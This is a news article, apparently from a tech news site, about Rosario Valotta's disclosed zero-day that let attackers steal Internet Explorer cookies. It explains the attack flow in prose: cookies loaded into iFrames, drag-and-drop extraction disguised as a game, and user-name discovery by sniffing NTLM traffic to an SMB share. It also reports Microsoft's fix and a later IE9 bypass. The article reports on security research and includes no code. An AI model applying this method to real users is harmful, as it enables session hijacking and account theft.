Internet Explorer: cookie theft made easy
Security researcher Rosario Valotta has discovered a zero-day hole in all versions of Internet Explorer that allows arbitrary cookies to be stolen on the net. Internet Explorer's security zone mechanism usually prevents sites in the internet zone from embedding local zone content, for instance from a user's hard disk, into iFrames; however, the researcher discovered that cookies appear to be exempt from this mechanism and can actually be loaded into iFrames. The cookies are then marked as invisible text and shifted from the iFrame to the main window by the user via drag&drop. To prevent users from noticing what was happening, Valotta packaged the whole thing in a game.
This is not a trivial attack: apart from having to solicit a user's co-operation so that the data can be extracted via drag&drop – something Valotta solved using a simple puzzle game in his demo video – a potential attacker must also know the exact path of the cookie. As that path contains the victim's Windows user name, the attacker needs to find this out beforehand.
Valotta solves this problem by embedding an image that is stored on a shared SMB network volume into the malicious web site. However, server access requires NTLM authentication. To authenticate, the computer sends the current user's user name in plain text, which the attacker can simply intercept using a packet sniffer. To complete the path, the attacker must also find out the victim's operating system version; this can be achieved, for example, by evaluating the navigator.userAgent JavaScript object. Compared to a passive attack via Firesheep, Valotta's approach is, therefore, considerably more involved.
Talking to Reuters, Valotta said that he harvested more than 80 cookies from his 150 Facebook friends within three days. The researcher notified the Microsoft Security Response Center of the original hole on 28 January 2011 and Microsoft solved the problem before the final version of IE9 was released on 18 March. However, only two weeks later, Valotta found a slightly modified approach that also allowed him to steal cookies from IE9 users, which he demonstrated (direct download PowerPoint file) at the Hackinthebox conference in Amsterdam.
(crve)
![Kernel Log: Coming in 3.10 (Part 3) [--] Infrastructure](/imgs/43/1/0/4/2/6/7/2/comingin310_4_kicker-4977194bfb0de0d7.png)
![Kernel Log: Coming in 3.10 (Part 3) [--] Infrastructure](/imgs/43/1/0/4/2/3/2/3/comingin310_3_kicker-151cd7b9e9660f05.png)
